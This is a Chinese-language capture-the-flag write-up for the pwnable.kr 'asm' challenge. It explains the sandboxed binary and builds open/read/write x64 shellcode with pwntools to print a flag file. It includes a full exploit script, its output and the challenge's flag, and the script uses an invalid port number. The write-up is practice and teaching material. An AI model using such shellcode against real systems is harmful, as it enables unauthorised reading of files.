0%

pwnable.kr —— asm

question#

1
2
3
Mommy! I think I know how to make shellcodes

ssh asm@pwnable.kr -p2222 (pw: guest)

analyse#

拖入ida伪代码可以看到

1
2
3
4
5
6
7
8
9
10
11
12
13
14
puts("Welcome to shellcoding practice challenge.");
puts("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.");
puts("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.");
puts("If this does not challenge you. you should play 'asg' challenge :)");
s = (char *)mmap((void *)0x41414000, 0x1000uLL, 7, 50, 0, 0LL);
memset(s, 144, 0x1000uLL);
v4 = strlen(stub);
memcpy(s, stub, v4);
printf("give me your x64 shellcode: ", stub, argv);
read(0, s + 46, 0x3E8uLL);
alarm(0xAu);
chroot("/home/asm_pwn");
sandbox("/home/asm_pwn");
((void (*)(void))s)();

也就是要求我们自己写shellcode,来实现读取flag的操作,注意,只能使用open,read,write三个系统函数。

本来网站http://syscalls.kernelgrok.com/可以查调用表的,不过好像因为维护上不去,所以我用它的github项目部署了一下http://syscall.ycdxsb.cn/

这里为了方便些shellcode,我们可以用pwntools的shellcraft模块编写http://docs.pwntools.com/en/stable/shellcraft/amd64.html

首先我们需要将函数名push到栈中

1
2
3
4
filename = 'this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong'

payload = ''
payload += shellcraft.amd64.pushstr(filename)

由于是push进去的,所以这个时候rsp存的就是函数名,接着我们使用open打开这个文件

1
payload += shellcraft.amd64.open('rsp',0,0)

由于是封装好了,所以这里的参数和实际的open函数参数一致

对于64位函数,执行完后的返回值就在rax中,也就是我们open函数的fd值在rax中,然后我们需要使用read函数将内容读到rsp指向的内存中,如下

1
payload += shellcraft.amd64.read('rax','rsp',100)

最后使用write函数将rsp内容输出到屏幕上

1
payload += shellcraft.amd64.write(1,'rsp',100)

get flag#

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
from pwn import *
context(arch='amd64',os='linux')
#p = process('asm')
p = remote('127.0.0.1',99026)

filename = 'this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong'

payload = ''
payload += shellcraft.amd64.pushstr(filename)
payload += shellcraft.amd64.open('rsp',0,0)
payload += shellcraft.amd64.read('rax','rsp',100)
payload += shellcraft.amd64.write(1,'rsp',100)
p.recvuntil('shellcode: ')
p.sendline(asm(payload))
print p.recv()
1
2
3
4
5
[DEBUG] Received 0x64 bytes:
'Mak1ng_shelLcodE_i5_veRy_eaSy\n'
'lease_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooo'
Mak1ng_shelLcodE_i5_veRy_eaSy
lease_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooo

flag:Mak1ng_shelLcodE_i5_veRy_eaSy

坚持原创技术分享,您的支持将鼓励我继续创作!